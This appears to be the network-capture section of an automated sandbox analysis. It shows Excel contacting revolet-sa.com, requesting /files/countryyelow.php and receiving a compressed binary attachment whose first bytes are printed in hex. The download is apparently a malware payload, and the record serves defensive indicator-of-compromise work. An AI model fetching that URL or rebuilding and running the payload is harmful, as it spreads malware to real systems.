                Apr 6, 2021 21:03:00.740622997 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740638018 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740641117 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740675926 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740700960 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740711927 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740711927 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740750074 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740772009 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740787983 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740792036 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740835905 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740847111 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740878105 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740892887 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740915060 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740941048 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.740953922 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.740958929 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.741013050 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745573997 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745642900 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745676041 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745704889 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745737076 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745744944 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745784998 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745788097 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745796919 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745822906 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745841026 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745862007 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745871067 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745898962 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745930910 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745935917 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.745965958 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.745974064 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746000051 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746021986 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746037960 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746063948 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746093988 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746102095 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746114969 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746136904 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746140957 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746179104 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746210098 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746213913 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746229887 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746251106 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746258974 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746288061 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746314049 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746335030 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746335030 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746376991 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746402025 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746413946 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746428013 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746453047 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746478081 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746490955 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746493101 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746526957 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746560097 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746565104 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.746577024 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.746630907 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.747891903 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.747966051 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.756706953 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.756742954 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.756819010 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.756856918 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.756882906 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758456945 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758487940 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758516073 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758543015 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758570910 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758599997 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758601904 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758635044 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758646965 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758666992 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758667946 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758694887 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758696079 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758724928 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758734941 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758747101 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758752108 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758775949 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758780003 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.758812904 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.758842945 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759221077 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759249926 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759310007 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759497881 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759571075 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759748936 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759789944 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759821892 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759826899 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759860039 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759865999 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759893894 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759903908 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.759943008 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.759978056 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760247946 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760288000 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760335922 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760350943 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760380030 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760421038 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760458946 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760463953 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760477066 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760495901 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760523081 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760543108 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760548115 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760586023 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760612011 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760623932 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760660887 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760668039 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760679007 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760699034 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760711908 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760735989 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760773897 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760775089 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760785103 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760811090 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760819912 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760859013 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760867119 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760901928 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760927916 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760938883 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760951042 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.760977030 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.760984898 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761014938 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761043072 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761051893 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761065006 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761090040 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761096001 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761127949 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761152029 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761176109 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761184931 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761217117 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761230946 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761254072 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761279106 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761291981 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761305094 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761329889 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761329889 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761365891 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761414051 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761421919 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761434078 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761472940 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761497021 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761507988 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761518002 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761547089 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761554003 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761599064 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761625051 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761635065 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761661053 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761673927 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761689901 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761712074 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761723995 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761749983 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.761774063 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.761802912 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.765363932 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.766243935 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.925920963 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.925993919 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926023960 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926053047 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926090956 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926143885 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926186085 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926223040 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926227093 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926255941 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926260948 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926261902 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926297903 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926300049 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926337004 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926347017 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926357985 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926374912 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926387072 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926410913 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926433086 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926455021 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926459074 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926501036 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926518917 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926533937 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926537037 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926574945 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926599979 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926614046 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926615953 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926651001 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926677942 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926687956 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926706076 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926723957 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926743031 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926768064 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926773071 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926815987 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926842928 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926852942 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926866055 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926891088 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926898003 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926928997 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926954985 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.926964998 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.926991940 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927002907 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.927020073 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927041054 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.927057981 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927088022 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.927105904 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927129984 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.927156925 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927161932 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.927191973 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.927208900 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.929373980 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.931448936 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:05.562063932 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:05.562218904 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:35.565264940 CEST8049165192.232.249.186192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 6, 2021 21:02:58.993803978 CEST5219753192.168.2.228.8.8.8
                Apr 6, 2021 21:02:59.039887905 CEST53521978.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 6, 2021 21:02:58.993803978 CEST192.168.2.228.8.8.80xfc39Standard query (0)revolet-sa.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 6, 2021 21:02:59.039887905 CEST8.8.8.8192.168.2.220xfc39No error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • revolet-sa.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249165192.232.249.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 6, 2021 21:02:59.245107889 CEST0OUTGET /files/countryyelow.php HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: revolet-sa.com
                Connection: Keep-Alive
                Apr 6, 2021 21:02:59.806935072 CEST2INHTTP/1.1 200 OK
                Date: Tue, 06 Apr 2021 19:02:59 GMT
                Server: Apache
                Content-Disposition: attachment; filename="srOQV.fbx"
                Upgrade: h2,h2c
                Connection: Upgrade, Keep-Alive
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Keep-Alive: timeout=5, max=75
                Transfer-Encoding: chunked
                Content-Type: application/octet-stream
                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y
                Apr 6, 2021 21:02:59.806989908 CEST3INData Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be
                Data Ascii: Oj-;)>d``O7N~M0?M>F|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!|~!
